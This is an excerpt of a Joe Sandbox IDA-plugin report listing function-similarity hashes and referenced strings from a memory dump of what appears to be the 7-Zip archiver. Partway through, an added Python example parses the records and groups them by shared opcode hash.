                                • Instruction ID: b4b29b629b534af47c0e72f76c5fc4f5d5e22999bd9d57ca123f7e5e9fa2881d
                                • Opcode Fuzzy Hash: 8ba75d28dd331cce65981d77e998c4092c08d57d4028349734a31fdcd73601a5
                                • Instruction Fuzzy Hash: E1312976204A8581DB119F25D4803EE2361FB94F9CF484137DE8E8B668DFBCC889C359
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: crc32$crc64$md5$sha1$sha256
                                • API String ID: 1294909896-3826973078
                                • Opcode ID: 627808585f67796ce0ce0483dea4fd69f057094cedb4e7811970197654dcad54
                                • Instruction ID: 043f6aca9a295d193e7166c93db3661b4276bcb881e984d6808ee712ca8f6703
                                • Opcode Fuzzy Hash: 627808585f67796ce0ce0483dea4fd69f057094cedb4e7811970197654dcad54
                                • Instruction Fuzzy Hash: 2821FB7230468499EA30DF12E64039E6321D3857E4F548227DA5E47B65DF7CDAC6C308
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree
                                • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                • API String ID: 2581285248-1259944392
                                • Opcode ID: b7d0c9e13f612dcd9a93b48e2bf9113342a65e5be0b76e18f2c2d7fa1630b9af
                                • Instruction ID: 5f12af013c31d002f92eec7f85182ce637858c13440e76f6108b00106acf947a
                                • Opcode Fuzzy Hash: b7d0c9e13f612dcd9a93b48e2bf9113342a65e5be0b76e18f2c2d7fa1630b9af
                                • Instruction Fuzzy Hash: D42195B2304A4595CF24EB17E85039A6721E789BECF480227AF4E87775EF6CC595C704
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                • API String ID: 667068680-4044117955
                                • Opcode ID: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                                • Instruction ID: 4871cd20d9800b711f5a5003285b4a5d70b73019dfdc9ac001d7e3d547414c14
                                • Opcode Fuzzy Hash: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                                • Instruction Fuzzy Hash: 8BE046E8616B0AC1EF408BD2FC8831023A0F308794F8010A1CA0D43330EF3C8699C308
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 01a6a2b08de4f07bd8a7e960d8ce1f279f191e836e97f789a585fd570255e9d4
                                • Instruction ID: 75a9ba0a4e762691e94221d2b7aa77a15c89c44b90b94b13807eaec9c85b0cea
                                • Opcode Fuzzy Hash: 01a6a2b08de4f07bd8a7e960d8ce1f279f191e836e97f789a585fd570255e9d4
                                • Instruction Fuzzy Hash: ED6107332086D096CB31DB26E44129FB720F7C6B94F954117EF9A47B1ACA7CC58ACB58
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 952ed7c5f00870a6d072419502f70e493fa4ab4cb7f3740f3dbfcaea093a6856
                                • Instruction ID: ec7a19b39be492284fee7cfa56ea5d0cc1ff50f8ab28ed09893d760c95a1a057
                                • Opcode Fuzzy Hash: 952ed7c5f00870a6d072419502f70e493fa4ab4cb7f3740f3dbfcaea093a6856
                                • Instruction Fuzzy Hash: 55713C72305B4486CB14DF2AE55036D67A0FB89B94F54422AEB6E87B64CF3DD862CB04
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: f9b73384b53ea654a700601d9f87f94090fd67aa3f7ff949fe032c8bbf510844
                                • Instruction ID: 4692b11ad228b1552a9577589f16764159f0e80fc9247a20fe0e1e9c2cee353b
                                • Opcode Fuzzy Hash: f9b73384b53ea654a700601d9f87f94090fd67aa3f7ff949fe032c8bbf510844
                                • Instruction Fuzzy Hash: 89412B3324A2C0D5CB11DF25F0502AEBB20E7D1798F84421BEB9947769DB6DC9DACB09
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememmove$ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 1818558235-0
                                • Opcode ID: 9fb808bbfa609137d1fdf85ecbcd6e1857a504d74eac7a4c1e6a3e0381ab0ad7
                                • Instruction ID: c176494443d47ae3ed20707f424687d1c54345aef82683a25d8e60925c9e921d
                                • Opcode Fuzzy Hash: 9fb808bbfa609137d1fdf85ecbcd6e1857a504d74eac7a4c1e6a3e0381ab0ad7
                                • Instruction Fuzzy Hash: 09315AB27016588B8B64DF3BD48245DB3A4E758FD8318512BEE2DDB708DE68DC92CB44
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 1b8a1aa51232dedb969a71f5f3019cc1aacb03ae41857c4e251de1aaed421467
                                • Instruction ID: 6b155affe2811f0a11e53e27a3701a488a3ecd319dabe0c90659add70e859248
                                • Opcode Fuzzy Hash: 1b8a1aa51232dedb969a71f5f3019cc1aacb03ae41857c4e251de1aaed421467
                                • Instruction Fuzzy Hash: C4118632740B8997C614AA36EA502AD2310FB81BA4F4803369F3D5B751CF68C8758304
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: cf44059c6c32b5cb6a0f39292633820c0cbf2afead3bca816bedd606f8241d4f
                                • Instruction ID: 099aca6132e3e54ed484c6f3abc354d9196f1f4c296e07d982f3a97c23e77b67
                                • Opcode Fuzzy Hash: cf44059c6c32b5cb6a0f39292633820c0cbf2afead3bca816bedd606f8241d4f
                                • Instruction Fuzzy Hash: F6F031312C565E42CB10F733E55556E6710E7C2F85B441117EE5A97721CE6CC4A6860D
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: fa36d317f4e258a045e58811932722eef90d09ce1aabdeaf0b4425d617853f98
                                • Instruction ID: 1228bd8c72b465c8895b5563aa6103725929dd70f82e2e77421cee21d7fd95a7
                                • Opcode Fuzzy Hash: fa36d317f4e258a045e58811932722eef90d09ce1aabdeaf0b4425d617853f98
                                • Instruction Fuzzy Hash: EBF04F312CA69D46CB10F733E5555AE6710EBC2F85B441127EE5E97722CE6CC4A6C20C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 021e2c5d6e07651c19eb1ab04e3ea46e36c024787ef77c11b8bc16346f8d79da
                                • Instruction ID: 18599cb7f3f9b7b3d6df2c84e8f75a1cd786a4a34b24f6d364031ddfb8af8c40
                                • Opcode Fuzzy Hash: 021e2c5d6e07651c19eb1ab04e3ea46e36c024787ef77c11b8bc16346f8d79da
                                • Instruction Fuzzy Hash: 19F04F322CA68D42CB10F733E5555AE6B10EBC6F85B441516EE6E97722CE6CC4B6820C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 9033fa371487fd137d000dc9ca7ebdd7d74c581a715bbfbf13cd9923f6b6f07d
                                • Instruction ID: 777cb1a787dd9e1d9e850d1360769a7239075037f971cf093adb8dccfd3e64bb
                                • Opcode Fuzzy Hash: 9033fa371487fd137d000dc9ca7ebdd7d74c581a715bbfbf13cd9923f6b6f07d
                                • Instruction Fuzzy Hash: 2EF04F3228A68D42CB10F733E5615AE6710E7C2F85B442117EE6E97722CE6CC4A6820C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: db5ba24876c63a59b12deff57d4e77219ce991600060bb8642b998b56719081c
                                • Instruction ID: 178e30912aa32611047a61e00777ee66d50124d256f406aa1db2fe07f9086a67
                                • Opcode Fuzzy Hash: db5ba24876c63a59b12deff57d4e77219ce991600060bb8642b998b56719081c
                                • Instruction Fuzzy Hash: 22F030312C564D82CB10FB33E1615AE5310EBC6F85B402117EE2F97722DE6CC4A7860C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction ID: c0d60084a17261b8b9e25bfc80dc998b068c45f1c245e92f77751abebe3ef8db
                                • Opcode Fuzzy Hash: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction Fuzzy Hash: D2F0D0312C564D42CB14FB33E55156E5710EBC6F85B406517EE6E97722CE6CC4A7860C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 70d84a3f943c915080db66fc4ef9005961add26d4c2fea13df9d6efc16db21ed
                                • Instruction ID: e7d4db19fb9bd8cb212f3b8af5c2db735a04ceb4e669a445626379c4ff78fdd7
                                • Opcode Fuzzy Hash: 70d84a3f943c915080db66fc4ef9005961add26d4c2fea13df9d6efc16db21ed
                                • Instruction Fuzzy Hash: 1DF0BD31285A4E42CB14FB33E15166E5710EBC2F89B402117EE6A97725CE6CC4A6860D
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction ID: f18cc7a1f654f54450da9410a3f793cc0be3c8db2270a2544162cb5af638dca3
                                • Opcode Fuzzy Hash: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction Fuzzy Hash: EDF0D0312C564D42CB14FB33E55156E5710EBC6F85B402517EE6E97722CE6CC4A7860C
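The two records directly above share an Opcode ID (808e4064…) but carry different Instruction IDs. Assuming the field names mean what they suggest (Opcode ID hashing the opcode sequence alone, Instruction ID hashing the full instructions including operands), such a pair is the same code template instantiated with different operands, which is the case worth pulling out when hunting for reused or templated code across a report. Finding those pairs by hand in a listing of this size is impractical, so the following is an added Python example, not part of the Joe Sandbox report or its tooling, that parses these Similarity records, splits the `$`-joined API and string lists, and reports every Opcode ID that occurs with more than one Instruction ID. The sample input is three records copied from this section and trimmed to the fields the parser reads; the field names come from the page, the function names are the example's own.

```python
import re
from collections import defaultdict

# Sample input: three Similarity records copied from the report above,
# trimmed to the fields the parser needs. The last two share an Opcode ID.
SAMPLE = """\
Similarity
• API ID: free
• String ID: crc32$crc64$md5$sha1$sha256
• API String ID: 1294909896-3826973078
• Opcode ID: 627808585f67796ce0ce0483dea4fd69f057094cedb4e7811970197654dcad54
• Instruction ID: 043f6aca9a295d193e7166c93db3661b4276bcb881e984d6808ee712ca8f6703
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
• Instruction ID: c0d60084a17261b8b9e25bfc80dc998b068c45f1c245e92f77751abebe3ef8db
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
• Instruction ID: f18cc7a1f654f54450da9410a3f793cc0be3c8db2270a2544162cb5af638dca3
"""

# One "• Key: value" line; the key is matched lazily so a ':' inside the
# value (e.g. the "Unknown switch:" string on this page) is not split on.
FIELD = re.compile(r"^\s*•\s*([A-Za-z ]+?):\s*(.*)$")


def parse_records(text):
    """Split report text into one dict per 'Similarity' block."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            current = {}
            records.append(current)
            continue
        match = FIELD.match(line)
        if current is not None and match:
            current[match.group(1).strip()] = match.group(2).strip()
    return records


def split_ids(value):
    """The report joins several APIs or strings with '$'; empty means none."""
    return [part for part in value.split("$") if part] if value else []


def group_by_opcode(records):
    """Map each Opcode ID to the list of Instruction IDs seen with it."""
    groups = defaultdict(list)
    for record in records:
        groups[record.get("Opcode ID", "")].append(record.get("Instruction ID", ""))
    return groups


def opcode_collisions(records):
    """Opcode IDs seen with more than one distinct Instruction ID: the same
    opcode sequence with different operands (assumed meaning of the two IDs)."""
    return {
        opcode: sorted(set(instructions))
        for opcode, instructions in group_by_opcode(records).items()
        if len(set(instructions)) > 1
    }


def all_strings(records):
    """Every distinct string referenced across the records, for quick triage."""
    seen = set()
    for record in records:
        seen.update(split_ids(record.get("String ID", "")))
    return sorted(seen)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records, strings: {all_strings(recs)}")
    for opcode, instrs in opcode_collisions(recs).items():
        print(f"opcode {opcode[:12]}… appears with {len(instrs)} instruction hashes")
```

Feed it the full text of the report rather than the trimmed sample to get the complete collision list; the strings it collects (here the 7-Zip-style hash names crc32, crc64, md5, sha1, sha256) are the quickest way to tell which library the fingerprinted functions belong to.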
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputsmemset
                                • String ID:
                                • API String ID: 469995913-0
                                • Opcode ID: 3d26b01c9de8f9ce5d4e083322491c96ecb96b900abf0e914f1e4e95d5619cf6
                                • Instruction ID: ea6d5a8fc78b0283f884f7b46332e660a8582aebc56638ddf5d84129bf179da3
                                • Opcode Fuzzy Hash: 3d26b01c9de8f9ce5d4e083322491c96ecb96b900abf0e914f1e4e95d5619cf6
                                • Instruction Fuzzy Hash: 6FF09C3229164D82C710FB32E5515AD2321E7C1B6CB445327AE7D9B2AACE6CC8A28348
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmovewcscmp
                                • String ID:
                                • API String ID: 3584677832-0
                                • Opcode ID: 302d0e8c5851f6606c1dcc2b539dfa9425df06aa2e85257a86ade80d1dc13571
                                • Instruction ID: ba491ed5b2dfb13c720a23c4e63ab87654708aac6c9fbcce2c6be26b7d3b4138
                                • Opcode Fuzzy Hash: 302d0e8c5851f6606c1dcc2b539dfa9425df06aa2e85257a86ade80d1dc13571
                                • Instruction Fuzzy Hash: F5818D36A01A84D6CF20EF56D89016E7361E348B98F44A23BDB2947764DB3DCC9EC709
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                • API String ID: 1294909896-2104980125
                                • Opcode ID: 2731b4e1964a7c269a4293f4648909575aaddce048e3c321215691093f0b9513
                                • Instruction ID: 22d986cf97962af9c3913335f4767e0070934fa0541368068a063449f56f4dee
                                • Opcode Fuzzy Hash: 2731b4e1964a7c269a4293f4648909575aaddce048e3c321215691093f0b9513
                                • Instruction Fuzzy Hash: 9261F0726056D4B6CB20EF25D5806EE7722F381798F809217DB8A87725EB7CC5CAC709
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: #
                                • API String ID: 1534225298-1885708031
                                • Opcode ID: 9f75db4a75c95e80460666ce991bc5cb072ca817b398ef2d3bb69d1fa6707b94
                                • Instruction ID: 9280e6ba3273ba65aa815b0c7246e14deb0b415e548c1ee7963ad44e6e6be69e
                                • Opcode Fuzzy Hash: 9f75db4a75c95e80460666ce991bc5cb072ca817b398ef2d3bb69d1fa6707b94
                                • Instruction Fuzzy Hash: 05517F36314B8482CB649B27E48029EA361F7C9B94F584216EF9E477A6DF7CC94AC704
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: -bit$DIRS$PGP$TAG$ZERO
                                • API String ID: 1294909896-2593822073
                                • Opcode ID: e5fe60c4106dc734c329ee4b6546d7a8d3d2cf1fbb7484c544a0f86324b991a4
                                • Instruction ID: 1744d8c1961a32a647f191225a164cfc9ecdb99073dbce9bb76cd5d5d6e9a51d
                                • Opcode Fuzzy Hash: e5fe60c4106dc734c329ee4b6546d7a8d3d2cf1fbb7484c544a0f86324b991a4
                                • Instruction Fuzzy Hash: 4B418673624680A1DF30EF21E4812DF6721F79478DF841127F68D42A29EB6CCB89C749
                                APIs
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                  • Part of subcall function 00448580: wcscmp.MSVCRT ref: 00448642
                                  • Part of subcall function 00448580: free.MSVCRT ref: 0044866E
                                  • Part of subcall function 00448580: free.MSVCRT ref: 00448678
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486B5
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486BD
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486CB
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486F9
                                  • Part of subcall function 00448580: free.MSVCRT ref: 00448701
                                  • Part of subcall function 00448580: free.MSVCRT ref: 0044870F
                                • free.MSVCRT ref: 00442331
                                • free.MSVCRT ref: 0044233F
